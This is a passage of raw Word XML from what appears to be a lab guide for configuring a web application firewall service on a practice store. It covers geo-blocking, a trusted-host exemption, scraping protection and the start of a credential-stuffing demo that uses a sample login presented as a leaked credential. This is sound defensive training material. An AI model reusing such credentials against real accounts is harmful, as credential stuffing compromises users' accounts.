      <w:r w:rsidR="0000459B">
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="005E5001">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">much </w:t>
      </w:r>
      <w:r w:rsidR="005E5001">
        <w:t>more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ACD0AD" w14:textId="7A62EE5D" w:rsidR="00233C4A" w:rsidRDefault="00BB1043">
      <w:r>
        <w:t>So, in addition to being protected from the OWASP Top 10, the customer has the following requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EA3723" w14:textId="36F25407" w:rsidR="699639B3" w:rsidRDefault="003972D7" w:rsidP="699639B3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Geolocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294EECE8" w14:textId="135776DB" w:rsidR="00E90E4D" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007D01EA">
        <w:t>I only do business with US and UK. Can you block all other countries? I also want to block TOR nodes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and anonymous proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="007D01EA">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752BFD6" w14:textId="341931F2" w:rsidR="007D01EA" w:rsidRDefault="15E0CB9B" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB2B4A" w14:textId="1C4A82B9" w:rsidR="007D01EA" w:rsidRDefault="7A98A0B1" w:rsidP="32965056">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32965056">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Look</w:t>
      </w:r>
      <w:r w:rsidR="15E0CB9B" w:rsidRPr="32965056">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the available components in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="15E0CB9B" w:rsidRPr="32965056">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="15E0CB9B" w:rsidRPr="32965056">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see what would help block web requests outside of the US and UK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68991AB6" w14:textId="637133B6" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C75D7D" w14:textId="5CE3FAEC" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BE37B5" w14:textId="4072B7E3" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Address Geolocation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
      <w:r w:rsidR="1586DAB5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6D1E2" w14:textId="52608122" w:rsidR="1586DAB5" w:rsidRDefault="1586DAB5" w:rsidP="21B1CB40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19A91872" wp14:editId="0F58C2EF">
            <wp:extent cx="4791145" cy="2124075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="420279602" name="Picture 42027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1145" cy="2124075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59849F4E" w14:textId="3568D784" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the Geo IP Filter card, move all countries </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r>
        <w:t>United States and United Kingdom to the Blocked side.</w:t>
      </w:r>
      <w:r w:rsidR="4266A2AE">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6FC872" w14:textId="1D77613D" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Turn on blocking for TOR Nodes and Anonymous Proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DA250D" w14:textId="26751F35" w:rsidR="007D01EA" w:rsidRPr="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD24BCC" w14:textId="7CFBF1B9" w:rsidR="0CFF0B51" w:rsidRDefault="0CFF0B51">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C805AF3" w14:textId="77777777" w:rsidR="00F63ABA" w:rsidRDefault="00F63ABA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220C8D24" w14:textId="4C212CAD" w:rsidR="007D01EA" w:rsidRDefault="003972D7" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Allow Trusted Clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D05B2" w14:textId="165C804B" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:r>
        <w:t>“I have an anti-defacement service that accesses the store and I want it to be exempt from all WAF checks</w:t>
      </w:r>
      <w:r w:rsidR="1B722F6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and be able to do anything unconditionally</w:t>
      </w:r>
      <w:r w:rsidR="264EE83A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>The service always sends requests from the IP 38.227.79.50.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7783DE" w14:textId="77777777" w:rsidR="00934A79" w:rsidRPr="00934A79" w:rsidRDefault="00934A79" w:rsidP="00934A79">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00934A79">
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619A5F6E" w14:textId="16CB4089" w:rsidR="007D01EA" w:rsidRDefault="00934A79" w:rsidP="32965056">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="771C133F" w:rsidRPr="32965056">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Look </w:t>
      </w:r>
      <w:r w:rsidR="4CE0FD67" w:rsidRPr="32965056">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">at the available components in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="4CE0FD67" w:rsidRPr="32965056">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4CE0FD67" w:rsidRPr="32965056">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see what would </w:t>
      </w:r>
      <w:r w:rsidR="394A2234" w:rsidRPr="32965056">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>allow requests from a specific IP to be always “trusted”.</w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D412E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D412E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> you probably want to circle back to the “IP Address Geolocation” component and add this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D412E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D412E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> address as an allowed address under the “Network Exceptions” section, so that if that IP address falls outside the UK and USA, it is still allowed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D2E56" w14:textId="23324122" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE336D" w14:textId="486930E7" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trusted Hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266DA2F8" w14:textId="351E17CA" w:rsidR="3A943E86" w:rsidRDefault="3A943E86" w:rsidP="21B1CB40">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6F963A" wp14:editId="22807D2D">
            <wp:extent cx="5467350" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1680396535" name="Picture 168039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7350" cy="1352550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5699A015" w14:textId="6F0A25BE" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enable Trusted Hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D0A2DB" w14:textId="20C25557" w:rsidR="007D01EA" w:rsidRDefault="007D01EA" w:rsidP="007D01EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click Add Host. Enter the IP 38.227.79.50 and mask 255.255.255.255.  Enter “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Anti_Defacement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” for the </w:t>
      </w:r>
      <w:r w:rsidR="39837D8E">
        <w:t>name and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> click Add.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C1BFBA" w14:textId="0D65EAA2" w:rsidR="009638F5" w:rsidRPr="00B8004C" w:rsidRDefault="007D01EA" w:rsidP="00E309DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Click Save</w:t>
      </w:r>
      <w:r w:rsidR="009638F5">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="334AA67C" w14:textId="15B17D5B" w:rsidR="00DE1F9B" w:rsidRDefault="003972D7" w:rsidP="00DE1F9B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web Scraping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98B6A0" w14:textId="25CC2361" w:rsidR="00DE1F9B" w:rsidRDefault="00DE1F9B" w:rsidP="00DE1F9B">
      <w:r>
        <w:t xml:space="preserve">“My competitor, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TerribleStore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, started selling the same things and whenever I change my prices, their prices are almost immediately 1 cent cheaper than mine!  How do they do that?  How do I stop them?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B58D62" w14:textId="77777777" w:rsidR="00DE1F9B" w:rsidRDefault="00DE1F9B" w:rsidP="00DE1F9B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3F4996" w14:textId="5C2C089E" w:rsidR="00DE1F9B" w:rsidRDefault="01863C00" w:rsidP="00DE1F9B">
      <w:r>
        <w:t>Consider what</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:t xml:space="preserve"> type of </w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve">nefarious methods </w:t>
      </w:r>
      <w:r w:rsidR="005B6E1F">
        <w:t xml:space="preserve">team </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B6E1F">
        <w:t>TerribleStore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B6E1F">
        <w:t xml:space="preserve">might </w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:t xml:space="preserve">use to </w:t>
      </w:r>
      <w:r w:rsidR="005B6E1F">
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:t>all our products and prices</w:t>
      </w:r>
      <w:r w:rsidR="005B6E1F">
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve">  Probably some kind of automated web-scraping </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D412E1">
        <w:t>tool</w:t>
      </w:r>
      <w:r w:rsidR="005B6E1F">
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005B6E1F">
        <w:t>hmmm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B6E1F">
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D412E1">
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve"> has web scraping protection under the DDOS Component, so add that, and the find Web Scraping there.  You can turn on insert hidden links and turn on insert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D412E1">
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve"> to make the web scraping protection more effective, and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D412E1">
        <w:t>don’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D412E1">
        <w:t xml:space="preserve"> forget to click save. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914FE7A" w14:textId="77777777" w:rsidR="00DE1F9B" w:rsidRDefault="00DE1F9B" w:rsidP="00DE1F9B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D48AA" w14:textId="1045291C" w:rsidR="00DE1F9B" w:rsidRDefault="00DE1F9B" w:rsidP="00DE1F9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The competitor is using a Web Scraper to scrape our customer’s price list</w:t>
      </w:r>
      <w:r w:rsidR="4B261D74">
        <w:t>. Let us</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stop them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3D011" w14:textId="2142F0CB" w:rsidR="00DE1F9B" w:rsidRDefault="00DE1F9B" w:rsidP="00DE1F9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add the Distributed Denial-of-Service component.  Choose Web Scraping</w:t>
      </w:r>
      <w:r w:rsidR="008354EB">
        <w:t xml:space="preserve">, turn on “insert hidden links” and “insert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008354EB">
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008354EB">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00787005">
        <w:t>, and click Save.</w:t>
      </w:r>
      <w:r w:rsidR="009638F5" w:rsidRPr="009638F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009638F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B68169" wp14:editId="78B411B8">
            <wp:extent cx="3054350" cy="1657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2485" cy="1678069"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1522F5" w14:textId="32C97C1F" w:rsidR="008A4FBA" w:rsidRDefault="008A4FBA" w:rsidP="699639B3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F7F6925" wp14:editId="33FA2AD1">
            <wp:extent cx="5943600" cy="193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1670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A917BD" w14:textId="309AB7E6" w:rsidR="00DE1F9B" w:rsidRPr="00DE1F9B" w:rsidRDefault="008A4FBA" w:rsidP="009638F5">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>After</w:t>
      </w:r>
      <w:r w:rsidR="00951BD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0022D986" wp14:editId="3C6AF9C6">
            <wp:extent cx="5934556" cy="1847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2257" cy="1853362"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3124FAB4" w14:textId="6EFCFF7D" w:rsidR="699639B3" w:rsidRDefault="699639B3"/>
    <w:p w14:paraId="43119F20" w14:textId="77777777" w:rsidR="00B8004C" w:rsidRDefault="00B8004C" w:rsidP="001A0E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Credential Stuffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2F7F9" w14:textId="4A200E35" w:rsidR="00A37923" w:rsidRDefault="00A37923" w:rsidP="00051308">
      <w:r>
        <w:t>There are lots of leaked credentials out there.  Change your passwords, kids!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACDDFBE" w14:textId="2E26DCD0" w:rsidR="00A37923" w:rsidRDefault="00A37923" w:rsidP="00051308">
      <w:r>
        <w:t xml:space="preserve">Go to your site directly ( </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00637DDF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://badstore&lt;student</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> number</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&gt;.cudathon.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1ED5C" w14:textId="3C75D75C" w:rsidR="00A37923" w:rsidRDefault="00A37923" w:rsidP="00051308">
      <w:r>
        <w:t>Click Login / Register and try logging in as</w:t>
      </w:r>
      <w:r w:rsidR="00956929">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00956929" w:rsidRPr="00637DDF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>julio.tan@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00956929">
        <w:t xml:space="preserve"> / please and </w:t>
      </w:r>
      <w:r w:rsidR="00707FF5">
        <w:t xml:space="preserve">you will see the login </w:t>
      </w:r>
      <w:r w:rsidR="00956929">
        <w:t xml:space="preserve">simply </w:t>
      </w:r>
      <w:r w:rsidR="00707FF5">
        <w:t>fails</w:t>
      </w:r>
      <w:r w:rsidR="00956929">
        <w:t xml:space="preserve">.  Little do we know this is a leaked credential being stuffed in.  But the WAF knows! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593ED163" w14:textId="3D066D20" w:rsidR="00B8004C" w:rsidRDefault="00956929" w:rsidP="00051308">
      <w:r>
        <w:t xml:space="preserve">Go to your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WAFaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin tab and a</w:t>
      </w:r>
      <w:r w:rsidR="00051308">
        <w:t>dd the Bot Protection component</w:t>
      </w:r>
      <w:r w:rsidR="004C3974">
